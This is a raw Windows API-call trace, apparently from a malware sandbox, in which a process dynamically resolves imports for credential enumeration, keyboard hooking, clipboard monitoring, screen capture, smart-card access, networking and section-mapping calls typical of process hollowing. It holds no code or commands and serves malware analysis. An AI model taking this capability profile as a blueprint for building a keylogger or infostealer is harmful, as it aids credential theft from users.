	[0095.860] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptDestroyKey") returned 0x74ac0400
	[0095.860] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptGetUserKey") returned 0x74ad6c30
	[0095.860] GetProcAddress (hModule=0x74aa0000, lpProcName="IsValidSecurityDescriptor") returned 0x74ad7070
	[0095.860] GetProcAddress (hModule=0x74aa0000, lpProcName="LookupPrivilegeValueW") returned 0x74abe430
	[0095.860] GetProcAddress (hModule=0x74aa0000, lpProcName="AdjustTokenPrivileges") returned 0x74ac0980
	[0095.860] GetProcAddress (hModule=0x74aa0000, lpProcName="InitializeSecurityDescriptor") returned 0x74abfc00
	[0095.860] GetProcAddress (hModule=0x74aa0000, lpProcName="SetSecurityDescriptorDacl") returned 0x74abf830
	[0095.861] GetProcAddress (hModule=0x74aa0000, lpProcName="InitializeAcl") returned 0x74abfa80
	[0095.861] GetProcAddress (hModule=0x74aa0000, lpProcName="SetSecurityDescriptorSacl") returned 0x74ac2a20
	[0095.861] GetProcAddress (hModule=0x74aa0000, lpProcName="RegQueryValueExW") returned 0x74abf330
	[0095.861] GetProcAddress (hModule=0x74aa0000, lpProcName="RegCreateKeyExW") returned 0x74abfa20
	[0095.861] GetProcAddress (hModule=0x74aa0000, lpProcName="RegQueryInfoKeyW") returned 0x74abf640
	[0095.861] GetProcAddress (hModule=0x74aa0000, lpProcName="RegDeleteKeyW") returned 0x74ac04f0
	[0095.862] GetProcAddress (hModule=0x74aa0000, lpProcName="RegDeleteValueW") returned 0x74ac0fb0
	[0095.862] GetProcAddress (hModule=0x74aa0000, lpProcName="RegOpenCurrentUser") returned 0x74ac1080
	[0095.862] GetProcAddress (hModule=0x74aa0000, lpProcName="RegEnumValueW") returned 0x74abf680
	[0095.862] GetProcAddress (hModule=0x74aa0000, lpProcName="RegOpenKeyExW") returned 0x74abf350
	[0095.862] GetProcAddress (hModule=0x74aa0000, lpProcName="RegEnumKeyExW") returned 0x74abf470
	[0095.862] GetProcAddress (hModule=0x74aa0000, lpProcName="RegSetValueExW") returned 0x74abf7f0
	[0095.862] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptGetHashParam") returned 0x74abf7d0
	[0095.862] GetProcAddress (hModule=0x74aa0000, lpProcName="CredFree") returned 0x74ac3930
	[0095.863] GetProcAddress (hModule=0x74aa0000, lpProcName="RegEnumKeyExA") returned 0x74ac1810
	[0095.863] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptAcquireContextA") returned 0x74ac0630
	[0095.863] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptCreateHash") returned 0x74abfa00
	[0095.863] GetProcAddress (hModule=0x74aa0000, lpProcName="RegEnumValueA") returned 0x74ac1e70
	[0095.863] GetProcAddress (hModule=0x74aa0000, lpProcName="CredEnumerateA") returned 0x74ad6670
	[0095.863] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptDestroyHash") returned 0x74ac02a0
	[0095.863] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptHashData") returned 0x74abfb10
	[0095.863] GetProcAddress (hModule=0x74aa0000, lpProcName="DeregisterEventSource") returned 0x74ab8570
	[0095.864] GetProcAddress (hModule=0x74aa0000, lpProcName="RegisterEventSourceA") returned 0x74ac1570
	[0095.864] GetProcAddress (hModule=0x74aa0000, lpProcName="FreeSid") returned 0x74ac0440
	[0095.864] GetProcAddress (hModule=0x74aa0000, lpProcName="SetSecurityInfo") returned 0x74ac05f0
	[0095.864] GetProcAddress (hModule=0x74aa0000, lpProcName="AllocateAndInitializeSid") returned 0x74abf660
	[0095.864] GetProcAddress (hModule=0x74aa0000, lpProcName="GetSecurityInfo") returned 0x74abfbe0
	[0095.864] GetProcAddress (hModule=0x74aa0000, lpProcName="SetEntriesInAclA") returned 0x74ac3cc0
	[0095.864] GetProcAddress (hModule=0x74aa0000, lpProcName="GetUserNameW") returned 0x74ac1030
	[0095.865] GetProcAddress (hModule=0x74aa0000, lpProcName="ReportEventA") returned 0x74ad37a0
	[0095.865] GetModuleHandleA (lpModuleName="USER32.dll") returned 0x77810000
	[0095.865] GetProcAddress (hModule=0x77810000, lpProcName="DispatchMessageW") returned 0x778262e0
	[0095.865] GetProcAddress (hModule=0x77810000, lpProcName="LoadCursorW") returned 0x7782abd0
	[0095.865] GetProcAddress (hModule=0x77810000, lpProcName="ToUnicodeEx") returned 0x77892420
	[0095.865] GetProcAddress (hModule=0x77810000, lpProcName="GetWindowThreadProcessId") returned 0x7782da50
	[0095.865] GetProcAddress (hModule=0x77810000, lpProcName="CallNextHookEx") returned 0x77823550
	[0095.865] GetProcAddress (hModule=0x77810000, lpProcName="GetKeyState") returned 0x7782ddd0
	[0095.866] GetProcAddress (hModule=0x77810000, lpProcName="GetMessageW") returned 0x77844f60
	[0095.866] GetProcAddress (hModule=0x77810000, lpProcName="CloseClipboard") returned 0x778495c0
	[0095.866] GetProcAddress (hModule=0x77810000, lpProcName="MapVirtualKeyA") returned 0x77843e20
	[0095.866] GetProcAddress (hModule=0x77810000, lpProcName="DrawIcon") returned 0x7783f6e0
	[0095.866] GetProcAddress (hModule=0x77810000, lpProcName="GetIconInfo") returned 0x77840160
	[0095.866] GetProcAddress (hModule=0x77810000, lpProcName="DefWindowProcW") returned 0x779eaee0
	[0095.866] GetProcAddress (hModule=0x77810000, lpProcName="SetClipboardViewer") returned 0x77849a80
	[0095.867] GetProcAddress (hModule=0x77810000, lpProcName="SendMessageW") returned 0x77825d90
	[0095.867] GetProcAddress (hModule=0x77810000, lpProcName="UnhookWindowsHookEx") returned 0x77848fe0
	[0095.867] GetProcAddress (hModule=0x77810000, lpProcName="OpenClipboard") returned 0x77843920
	[0095.867] GetProcAddress (hModule=0x77810000, lpProcName="SetWindowsHookExW") returned 0x7782fb10
	[0095.867] GetProcAddress (hModule=0x77810000, lpProcName="CreateWindowExW") returned 0x77829860
	[0095.867] GetProcAddress (hModule=0x77810000, lpProcName="GetWindowTextW") returned 0x7783cb20
	[0095.867] GetProcAddress (hModule=0x77810000, lpProcName="GetClipboardData") returned 0x77842bf0
	[0095.867] GetProcAddress (hModule=0x77810000, lpProcName="GetProcessWindowStation") returned 0x77848b10
	[0095.868] GetProcAddress (hModule=0x77810000, lpProcName="MessageBoxA") returned 0x7788fec0
	[0095.868] GetProcAddress (hModule=0x77810000, lpProcName="GetUserObjectInformationW") returned 0x77848fa0
	[0095.868] GetProcAddress (hModule=0x77810000, lpProcName="GetMessageA") returned 0x7783e130
	[0095.868] GetProcAddress (hModule=0x77810000, lpProcName="MapVirtualKeyW") returned 0x77843c80
	[0095.868] GetProcAddress (hModule=0x77810000, lpProcName="DispatchMessageA") returned 0x77846f10
	[0095.868] GetProcAddress (hModule=0x77810000, lpProcName="IsCharAlphaNumericW") returned 0x7789ac00
	[0095.869] GetProcAddress (hModule=0x77810000, lpProcName="TranslateMessage") returned 0x7782d9b0
	[0095.869] GetProcAddress (hModule=0x77810000, lpProcName="GetCursorPos") returned 0x7783f6c0
	[0095.869] GetProcAddress (hModule=0x77810000, lpProcName="wsprintfA") returned 0x778404a0
	[0095.869] GetProcAddress (hModule=0x77810000, lpProcName="CharLowerW") returned 0x7789ab20
	[0095.869] GetProcAddress (hModule=0x77810000, lpProcName="GetKeyboardState") returned 0x77849060
	[0095.869] GetProcAddress (hModule=0x77810000, lpProcName="GetForegroundWindow") returned 0x77848cb0
	[0095.869] GetProcAddress (hModule=0x77810000, lpProcName="RegisterClassExW") returned 0x77829580
	[0095.870] GetProcAddress (hModule=0x77810000, lpProcName="GetKeyboardLayout") returned 0x7782ef20
	[0095.870] GetProcAddress (hModule=0x77810000, lpProcName="GetAsyncKeyState") returned 0x7782e820
	[0095.870] GetModuleHandleA (lpModuleName="PSAPI.DLL") returned 0x772c0000
	[0095.870] GetProcAddress (hModule=0x772c0000, lpProcName="GetModuleFileNameExW") returned 0x772c13e0
	[0095.870] GetProcAddress (hModule=0x772c0000, lpProcName="GetProcessMemoryInfo") returned 0x772c16c0
	[0095.870] GetProcAddress (hModule=0x772c0000, lpProcName="GetModuleFileNameExA") returned 0x772c1660
	[0095.870] GetProcAddress (hModule=0x772c0000, lpProcName="EnumProcessModules") returned 0x772c1360
	[0095.871] GetModuleHandleA (lpModuleName="WS2_32.dll") returned 0x746c0000
	[0095.871] GetProcAddress (hModule=0x746c0000, lpProcName=0xb) returned 0x746c5240
	[0095.871] GetProcAddress (hModule=0x746c0000, lpProcName="WSAEnumProtocolsW") returned 0x746d7ed0
	[0095.871] GetProcAddress (hModule=0x746c0000, lpProcName=0x16) returned 0x746d4970
	[0095.871] GetProcAddress (hModule=0x746c0000, lpProcName="WSAIoctl") returned 0x746d2f70
	[0095.871] GetProcAddress (hModule=0x746c0000, lpProcName=0x5) returned 0x746d48b0
	[0095.871] GetProcAddress (hModule=0x746c0000, lpProcName=0x2) returned 0x746d3230
	[0095.871] GetProcAddress (hModule=0x746c0000, lpProcName=0x4) returned 0x746d6090
	[0095.872] GetProcAddress (hModule=0x746c0000, lpProcName=0x8) returned 0x746c4ab0
	[0095.872] GetProcAddress (hModule=0x746c0000, lpProcName=0x9) returned 0x746c4a90
	[0095.872] GetProcAddress (hModule=0x746c0000, lpProcName=0xd) returned 0x746d5f50
	[0095.872] GetProcAddress (hModule=0x746c0000, lpProcName=0x10) returned 0x746d1d20
	[0095.872] GetProcAddress (hModule=0x746c0000, lpProcName=0x17) returned 0x746ce6b0
	[0095.872] GetProcAddress (hModule=0x746c0000, lpProcName=0x15) returned 0x746cecc0
	[0095.872] GetProcAddress (hModule=0x746c0000, lpProcName=0x70) returned 0x746c5a10
	[0095.872] GetProcAddress (hModule=0x746c0000, lpProcName=0x7) returned 0x746d3e40
	[0095.873] GetProcAddress (hModule=0x746c0000, lpProcName="WSASocketW") returned 0x746ce7d0
	[0095.873] GetProcAddress (hModule=0x746c0000, lpProcName="WSASendTo") returned 0x746d7f90
	[0095.873] GetProcAddress (hModule=0x746c0000, lpProcName=0x6) returned 0x746d3830
	[0095.873] GetProcAddress (hModule=0x746c0000, lpProcName="WSARecvFrom") returned 0x746d8090
	[0095.873] GetProcAddress (hModule=0x746c0000, lpProcName="WSARecv") returned 0x746d2c50
	[0095.873] GetProcAddress (hModule=0x746c0000, lpProcName=0xa) returned 0x746ce180
	[0095.873] GetProcAddress (hModule=0x746c0000, lpProcName=0x12) returned 0x746d1f00
	[0095.873] GetProcAddress (hModule=0x746c0000, lpProcName="GetNameInfoW") returned 0x746d4050
	[0095.874] GetProcAddress (hModule=0x746c0000, lpProcName="GetAddrInfoW") returned 0x746d2180
	[0095.874] GetProcAddress (hModule=0x746c0000, lpProcName="FreeAddrInfoW") returned 0x746d5ee0
	[0095.874] GetProcAddress (hModule=0x746c0000, lpProcName="WSADuplicateSocketW") returned 0x746efca0
	[0095.874] GetProcAddress (hModule=0x746c0000, lpProcName="WSASend") returned 0x746d2de0
	[0095.874] GetProcAddress (hModule=0x746c0000, lpProcName=0xe) returned 0x746c4ab0
	[0095.874] GetProcAddress (hModule=0x746c0000, lpProcName=0x97) returned 0x746c47e0
	[0095.874] GetProcAddress (hModule=0x746c0000, lpProcName=0x11) returned 0x746d7370
	[0095.874] GetProcAddress (hModule=0x746c0000, lpProcName=0x3) returned 0x746cead0
	[0095.875] GetProcAddress (hModule=0x746c0000, lpProcName="WSCGetProviderPath") returned 0x746fde80
	[0095.875] GetProcAddress (hModule=0x746c0000, lpProcName=0xf) returned 0x746c4a90
	[0095.875] GetProcAddress (hModule=0x746c0000, lpProcName=0x39) returned 0x746f12a0
	[0095.875] GetProcAddress (hModule=0x746c0000, lpProcName=0x6f) returned 0x746c4f60
	[0095.875] GetProcAddress (hModule=0x746c0000, lpProcName=0xc) returned 0x746d59f0
	[0095.875] GetProcAddress (hModule=0x746c0000, lpProcName=0x73) returned 0x746c6520
	[0095.875] GetProcAddress (hModule=0x746c0000, lpProcName=0x13) returned 0x746d1b90
	[0095.875] GetProcAddress (hModule=0x746c0000, lpProcName=0x34) returned 0x746f1110
	[0095.876] GetModuleHandleA (lpModuleName="GDI32.dll") returned 0x76f00000
	[0095.876] GetProcAddress (hModule=0x76f00000, lpProcName="BitBlt") returned 0x76f82230
	[0095.876] GetProcAddress (hModule=0x76f00000, lpProcName="GetDeviceCaps") returned 0x76f80fe0
	[0095.876] GetProcAddress (hModule=0x76f00000, lpProcName="CreateDCW") returned 0x76fb2ab0
	[0095.876] GetProcAddress (hModule=0x76f00000, lpProcName="DeleteObject") returned 0x76f80810
	[0095.876] GetProcAddress (hModule=0x76f00000, lpProcName="SelectObject") returned 0x76f80440
	[0095.877] GetProcAddress (hModule=0x76f00000, lpProcName="CreateCompatibleBitmap") returned 0x76f82390
	[0095.877] GetProcAddress (hModule=0x76f00000, lpProcName="DeleteDC") returned 0x76f80d00
	[0095.877] GetProcAddress (hModule=0x76f00000, lpProcName="GetDIBits") returned 0x76f81580
	[0095.877] GetProcAddress (hModule=0x76f00000, lpProcName="CreateCompatibleDC") returned 0x76f82050
	[0095.877] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0095.878] GetProcAddress (hModule=0x77960000, lpProcName="RtlUnwind") returned 0x779c33a0
	[0095.878] GetProcAddress (hModule=0x77960000, lpProcName="memmove") returned 0x779dcc90
	[0095.878] GetProcAddress (hModule=0x77960000, lpProcName="wcschr") returned 0x779de7a0
	[0095.878] GetProcAddress (hModule=0x77960000, lpProcName="_stricmp") returned 0x779db580
	[0095.878] GetProcAddress (hModule=0x77960000, lpProcName="strncmp") returned 0x779ddea0
	[0095.878] GetProcAddress (hModule=0x77960000, lpProcName="memchr") returned 0x779dc820
	[0095.878] GetProcAddress (hModule=0x77960000, lpProcName="strncpy") returned 0x779ddf60
	[0095.879] GetProcAddress (hModule=0x77960000, lpProcName="strstr") returned 0x779de1a0
	[0095.879] GetProcAddress (hModule=0x77960000, lpProcName="_aullrem") returned 0x779da880
	[0095.879] GetProcAddress (hModule=0x77960000, lpProcName="strcspn") returned 0x779ddc80
	[0095.879] GetProcAddress (hModule=0x77960000, lpProcName="wcsstr") returned 0x779deaa0
	[0095.879] GetProcAddress (hModule=0x77960000, lpProcName="strchr") returned 0x779ddb20
	[0095.928] GetProcAddress (hModule=0x77960000, lpProcName="wcsrchr") returned 0x779dea00
	[0095.928] GetProcAddress (hModule=0x77960000, lpProcName="RtlNtStatusToDosError") returned 0x779b83c0
	[0095.928] GetProcAddress (hModule=0x77960000, lpProcName="strrchr") returned 0x779de110
	[0095.928] GetProcAddress (hModule=0x77960000, lpProcName="VerSetConditionMask") returned 0x779c1a40
	[0095.929] GetProcAddress (hModule=0x77960000, lpProcName="NtUnmapViewOfSection") returned 0x779d6f40
	[0095.929] GetProcAddress (hModule=0x77960000, lpProcName="ZwClose") returned 0x779d6d70
	[0095.929] GetProcAddress (hModule=0x77960000, lpProcName="NtCreateSection") returned 0x779d7140
	[0095.929] GetProcAddress (hModule=0x77960000, lpProcName="NtQueryVirtualMemory") returned 0x779d6ed0
	[0095.929] GetModuleHandleA (lpModuleName="WinSCard.dll") returned 0x0
	[0095.929] LoadLibraryA (lpLibFileName="WinSCard.dll") returned 0x6fff0000
	[0095.948] GetProcAddress (hModule=0x6fff0000, lpProcName="SCardEstablishContext") returned 0x6fffc590
	[0095.948] GetProcAddress (hModule=0x6fff0000, lpProcName="SCardFreeMemory") returned 0x6fffc9c0
	[0095.948] GetProcAddress (hModule=0x6fff0000, lpProcName="SCardDisconnect") returned 0x6fffc410
	[0095.948] GetProcAddress (hModule=0x6fff0000, lpProcName="SCardListReadersA") returned 0x70001ff0
	[0095.949] GetProcAddress (hModule=0x6fff0000, lpProcName="SCardConnectA") returned 0x70000e30
	[0095.949] GetModuleHandleA (lpModuleName="KERNEL32.dll") returned 0x765a0000
	[0095.949] GetProcAddress (hModule=0x765a0000, lpProcName="DecodePointer") returned 0x779bd830
	[0095.949] GetProcAddress (hModule=0x765a0000, lpProcName="GetModuleHandleExW") returned 0x765ba2b0
	[0095.949] GetProcAddress (hModule=0x765a0000, lpProcName="EncodePointer") returned 0x779bf730
	[0095.949] GetProcAddress (hModule=0x765a0000, lpProcName="GetCPInfo") returned 0x765ba290
	[0095.949] GetProcAddress (hModule=0x765a0000, lpProcName="IsProcessorFeaturePresent") returned 0x765b9bf0
	[0095.950] GetProcAddress (hModule=0x765a0000, lpProcName="SetStdHandle") returned 0x765e2430
	[0095.950] GetProcAddress (hModule=0x765a0000, lpProcName="SetFileAttributesW") returned 0x765c6c20
	[0095.950] GetProcAddress (hModule=0x765a0000, lpProcName="GetConsoleCP") returned 0x765c6f60
	[0095.950] GetProcAddress (hModule=0x765a0000, lpProcName="SystemTimeToTzSpecificLocalTime") returned 0x765c5c30
	[0095.950] GetProcAddress (hModule=0x765a0000, lpProcName="ReadConsoleInputA") returned 0x765c6fc0
	[0095.950] GetProcAddress (hModule=0x765a0000, lpProcName="RaiseException") returned 0x765b8c20
	[0095.950] GetProcAddress (hModule=0x765a0000, lpProcName="IsValidCodePage") returned 0x765ba790
	[0095.950] GetProcAddress (hModule=0x765a0000, lpProcName="GetACP") returned 0x765b8500
	[0095.951] GetProcAddress (hModule=0x765a0000, lpProcName="GetOEMCP") returned 0x765c5140
	[0095.951] GetProcAddress (hModule=0x765a0000, lpProcName="GetDriveTypeW") returned 0x765c6a10
	[0095.951] GetProcAddress (hModule=0x765a0000, lpProcName="FindFirstFileExW") returned 0x765c6940
	[0095.951] GetProcAddress (hModule=0x765a0000, lpProcName="GetStringTypeW") returned 0x765b7950
	[0095.951] GetProcAddress (hModule=0x765a0000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x765c6730
	[0095.951] GetProcAddress (hModule=0x765a0000, lpProcName="IsDebuggerPresent") returned 0x765bb0b0
	[0095.951] GetProcAddress (hModule=0x765a0000, lpProcName="UnhandledExceptionFilter") returned 0x765e2670
	[0095.952] GetProcAddress (hModule=0x765a0000, lpProcName="GetDateFormatW") returned 0x765bf7f0
	[0095.952] GetProcAddress (hModule=0x765a0000, lpProcName="GetTimeFormatW") returned 0x765bfd90
	[0095.952] GetProcAddress (hModule=0x765a0000, lpProcName="CompareStringW") returned 0x765c2630
	[0095.952] GetProcAddress (hModule=0x765a0000, lpProcName="GetLocaleInfoW") returned 0x765bcd70
	[0095.952] GetProcAddress (hModule=0x765a0000, lpProcName="IsValidLocale") returned 0x765bab40
	[0095.952] GetProcAddress (hModule=0x765a0000, lpProcName="GetUserDefaultLCID") returned 0x765c2920
	[0095.952] GetProcAddress (hModule=0x765a0000, lpProcName="EnumSystemLocalesW") returned 0x765bff10
	[0095.952] GetProcAddress (hModule=0x765a0000, lpProcName="SetEnvironmentVariableA") returned 0x765e22f0
	[0095.953] GetProcAddress (hModule=0x765a0000, lpProcName="FlushConsoleInputBuffer") returned 0x765c7080
	[0095.953] GetProcAddress (hModule=0x765a0000, lpProcName="FindClose") returned 0x765c68e0
	[0095.953] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalMemoryStatus") returned 0x765b8e00
	[0095.963] GetProcAddress (hModule=0x765a0000, lpProcName="GetWindowsDirectoryA") returned 0x765bb060
	[0095.963] GetProcAddress (hModule=0x765a0000, lpProcName="DebugBreak") returned 0x765e0920
	[0095.964] GetProcAddress (hModule=0x765a0000, lpProcName="ReadConsoleInputW") returned 0x765c6fd0
	[0095.964] GetProcAddress (hModule=0x765a0000, lpProcName="GetConsoleCursorInfo") returned 0x765c70b0
	[0095.964] GetProcAddress (hModule=0x765a0000, lpProcName="FillConsoleOutputAttribute") returned 0x765c7050
	[0095.964] GetProcAddress (hModule=0x765a0000, lpProcName="SetConsoleCursorInfo") returned 0x765c71a0
	[0095.964] GetProcAddress (hModule=0x765a0000, lpProcName="GetConsoleScreenBufferInfo") returned 0x765c70c0
	[0095.964] GetProcAddress (hModule=0x765a0000, lpProcName="FillConsoleOutputCharacterW") returned 0x765c7070
	[0095.964] GetProcAddress (hModule=0x765a0000, lpProcName="WriteConsoleW") returned 0x765c7020
	[0095.965] GetProcAddress (hModule=0x765a0000, lpProcName="SetConsoleCursorPosition") returned 0x765c71b0
	[0095.965] GetProcAddress (hModule=0x765a0000, lpProcName="SetConsoleMode") returned 0x765c7000
	[0095.965] GetProcAddress (hModule=0x765a0000, lpProcName="ReadConsoleW") returned 0x765c6fe0
	[0095.965] GetProcAddress (hModule=0x765a0000, lpProcName="SetConsoleTextAttribute") returned 0x765c71f0
	[0095.965] GetProcAddress (hModule=0x765a0000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x765c6f90
	[0095.965] GetProcAddress (hModule=0x765a0000, lpProcName="HeapAlloc") returned 0x77992bd0
	[0095.966] GetProcAddress (hModule=0x765a0000, lpProcName="HeapFree") returned 0x765b1ba0
	[0095.966] GetProcAddress (hModule=0x765a0000, lpProcName="GetCurrentThread") returned 0x765b75f0
	[0095.966] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessHeap") returned 0x765b7710
	[0095.966] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcAddress") returned 0x765b78b0
	[0095.966] GetProcAddress (hModule=0x765a0000, lpProcName="LoadLibraryA") returned 0x765c4bf0
	[0095.966] GetProcAddress (hModule=0x765a0000, lpProcName="GetModuleHandleA") returned 0x765b99f0
	[0095.966] GetProcAddress (hModule=0x765a0000, lpProcName="ExitProcess") returned 0x765c7b30
	[0095.966] GetProcAddress (hModule=0x765a0000, lpProcName="GetEnvironmentVariableW") returned 0x765b9970
	[0095.967] GetProcAddress (hModule=0x765a0000, lpProcName="CreateFileA") returned 0x765c6880
	[0095.967] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcmpA") returned 0x765bcc30
	[0095.967] GetProcAddress (hModule=0x765a0000, lpProcName="lstrlenA") returned 0x765b8c80
	[0095.967] GetProcAddress (hModule=0x765a0000, lpProcName="GetCurrentProcess") returned 0x765b38c0
	[0095.967] GetProcAddress (hModule=0x765a0000, lpProcName="SetEnvironmentVariableW") returned 0x765be9e0
	[0095.967] GetProcAddress (hModule=0x765a0000, lpProcName="GetEnvironmentStringsW") returned 0x765baac0
	[0095.967] GetProcAddress (hModule=0x765a0000, lpProcName="WaitForSingleObject") returned 0x765c6820
	[0095.968] GetProcAddress (hModule=0x765a0000, lpProcName="ExpandEnvironmentStringsA") returned 0x765c5dd0
	[0095.968] GetProcAddress (hModule=0x765a0000, lpProcName="WriteFile") returned 0x765c6ca0
	[0095.968] GetProcAddress (hModule=0x765a0000, lpProcName="Sleep") returned 0x765b7990
	[0095.968] GetProcAddress (hModule=0x765a0000, lpProcName="FormatMessageW") returned 0x765c4f80
	[0095.968] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcatA") returned 0x765bf640
	[0095.968] GetProcAddress (hModule=0x765a0000, lpProcName="ExitThread") returned 0x779c7a80
	[0095.968] GetProcAddress (hModule=0x765a0000, lpProcName="FlushFileBuffers") returned 0x765c69b0
	[0095.969] GetProcAddress (hModule=0x765a0000, lpProcName="GetLastError") returned 0x765b3870
	[0095.969] GetProcAddress (hModule=0x765a0000, lpProcName="GetModuleFileNameA") returned 0x765ba720
	[0095.969] GetProcAddress (hModule=0x765a0000, lpProcName="FreeEnvironmentStringsW") returned 0x765ba7e0
	[0095.969] GetProcAddress (hModule=0x765a0000, lpProcName="OutputDebugStringA") returned 0x765bfde0
	[0095.969] GetProcAddress (hModule=0x765a0000, lpProcName="CloseHandle") returned 0x765c6630
	[0095.969] GetProcAddress (hModule=0x765a0000, lpProcName="GetCurrentProcessId") returned 0x765b23e0
	[0095.969] GetProcAddress (hModule=0x765a0000, lpProcName="LocalFree") returned 0x765b79a0
	[0095.970] GetProcAddress (hModule=0x765a0000, lpProcName="CreateThread") returned 0x765b9b90
	[0095.970] GetProcAddress (hModule=0x765a0000, lpProcName="GetNativeSystemInfo") returned 0x765bac70
	[0095.970] GetProcAddress (hModule=0x765a0000, lpProcName="GetVolumeInformationA") returned 0x765c6b40
	[0095.970] GetProcAddress (hModule=0x765a0000, lpProcName="GetVersionExW") returned 0x765baa80
	[0095.970] GetProcAddress (hModule=0x765a0000, lpProcName="GetEnvironmentVariableA") returned 0x765ba8a0
	[0095.970] GetProcAddress (hModule=0x765a0000, lpProcName="SetUnhandledExceptionFilter") returned 0x765ba940
	[0095.970] GetProcAddress (hModule=0x765a0000, lpProcName="SetEvent") returned 0x765c67d0
	[0095.971] GetProcAddress (hModule=0x765a0000, lpProcName="GetModuleHandleW") returned 0x765b9bc0
	[0095.971] GetProcAddress (hModule=0x765a0000, lpProcName="IsBadReadPtr") returned 0x765b2510
	[0095.971] GetProcAddress (hModule=0x765a0000, lpProcName="GetCommandLineA") returned 0x765bab60
	[0095.971] GetProcAddress (hModule=0x765a0000, lpProcName="TerminateThread") returned 0x765c0160
	[0095.971] GetProcAddress (hModule=0x765a0000, lpProcName="IsBadCodePtr") returned 0x765bd0e0
	[0095.971] GetProcAddress (hModule=0x765a0000, lpProcName="SetLastError") returned 0x765b2af0
	[0095.972] GetProcAddress (hModule=0x765a0000, lpProcName="DisableThreadLibraryCalls") returned 0x765ba860
	[0095.972] GetProcAddress (hModule=0x765a0000, lpProcName="SetProcessWorkingSetSize") returned 0x765c0120
	[0095.972] GetProcAddress (hModule=0x765a0000, lpProcName="GetCurrentThreadId") returned 0x765b1b90
	[0095.972] GetProcAddress (hModule=0x765a0000, lpProcName="HeapDestroy") returned 0x765c4c30
	[0095.972] GetProcAddress (hModule=0x765a0000, lpProcName="HeapCreate") returned 0x765ba100
	[0095.972] GetProcAddress (hModule=0x765a0000, lpProcName="HeapReAlloc") returned 0x7798efe0
	[0095.972] GetProcAddress (hModule=0x765a0000, lpProcName="FileTimeToDosDateTime") returned 0x765c2930
	[0095.973] GetProcAddress (hModule=0x765a0000, lpProcName="SetFilePointer") returned 0x765c6c40
	[0095.973] GetProcAddress (hModule=0x765a0000, lpProcName="FreeLibrary") returned 0x765b9f50
	[0095.973] GetProcAddress (hModule=0x765a0000, lpProcName="LoadLibraryW") returned 0x765ba840
	[0095.973] GetProcAddress (hModule=0x765a0000, lpProcName="ReadFile") returned 0x765c6bb0
	[0095.973] GetProcAddress (hModule=0x765a0000, lpProcName="GetTempFileNameA") returned 0x765c6b00
	[0095.973] GetProcAddress (hModule=0x765a0000, lpProcName="FileTimeToLocalFileTime") returned 0x765c68d0
	[0095.973] GetProcAddress (hModule=0x765a0000, lpProcName="GetFileInformationByHandle") returned 0x765c6a60
	[0095.974] GetProcAddress (hModule=0x765a0000, lpProcName="GetTempPathA") returned 0x765c6b20
	[0095.974] GetProcAddress (hModule=0x765a0000, lpProcName="DeleteFileA") returned 0x765c68b0
	[0095.974] GetProcAddress (hModule=0x765a0000, lpProcName="SystemTimeToFileTime") returned 0x765c4c10
	[0095.974] GetProcAddress (hModule=0x765a0000, lpProcName="GetTickCount") returned 0x765c5eb0
	[0095.974] GetProcAddress (hModule=0x765a0000, lpProcName="LocalAlloc") returned 0x765b7a30
	[0095.974] GetProcAddress (hModule=0x765a0000, lpProcName="GetVersion") returned 0x765baaf0
	[0095.974] GetProcAddress (hModule=0x765a0000, lpProcName="GetSystemTime") returned 0x765c4940
	[0095.975] GetProcAddress (hModule=0x765a0000, lpProcName="OpenProcess") returned 0x765b8bf0
	[0095.975] GetProcAddress (hModule=0x765a0000, lpProcName="WaitForMultipleObjects") returned 0x765c6800
	[0095.975] GetProcAddress (hModule=0x765a0000, lpProcName="GetFileSize") returned 0x765c6a70
	[0095.975] GetModuleHandleA (lpModuleName="SHELL32.dll") returned 0x75120000
	[0095.976] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x771d0000
	[0095.976] GetModuleHandleA (lpModuleName="SHLWAPI.dll") returned 0x74b20000
	[0095.976] GetModuleHandleA (lpModuleName="WININET.dll") returned 0x702b0000
	[0095.976] GetModuleHandleA (lpModuleName="CRYPT32.dll") returned 0x0
	[0095.977] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x77050000
	[0095.980] GetModuleHandleA (lpModuleName="NETAPI32.dll") returned 0x77490000
	[0096.080] GetModuleHandleA (lpModuleName="IPHLPAPI.DLL") returned 0x71d30000
	[0096.080] GetModuleHandleA (lpModuleName="WINMM.dll") returned 0x0
	[0096.080] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x6fee0000
	[0096.149] GetModuleHandleA (lpModuleName="USERENV.dll") returned 0x701e0000
	[0096.150] GetModuleHandleA (lpModuleName="OLEAUT32.dll") returned 0x76b60000
	[0096.150] GetProcAddress (hModule=0x76b60000, lpProcName=0xc8) returned 0x76b99590
	[0096.153] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20afcf0 | out: lpSystemTimeAsFileTime=0x20afcf0*(dwLowDateTime=0x6ae54820, dwHighDateTime=0x1d492ec)) 
	[0096.153] GetCurrentThreadId () returned 0xc24
	[0096.153] GetCurrentProcessId () returned 0xdd4
	[0096.153] QueryPerformanceCounter (in: lpPerformanceCount=0x20afce8 | out: lpPerformanceCount=0x20afce8*=1817866000000) returned 1
	[0096.154] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.154] GetProcAddress (hModule=0x765a0000, lpProcName="FlsAlloc") returned 0x765ba980
	[0096.154] GetProcAddress (hModule=0x765a0000, lpProcName="FlsFree") returned 0x765c4ff0
	[0096.154] GetProcAddress (hModule=0x765a0000, lpProcName="FlsGetValue") returned 0x765b7570
	[0096.154] GetProcAddress (hModule=0x765a0000, lpProcName="FlsSetValue") returned 0x765b9e30
	[0096.154] GetProcAddress (hModule=0x765a0000, lpProcName="InitializeCriticalSectionEx") returned 0x765c6740
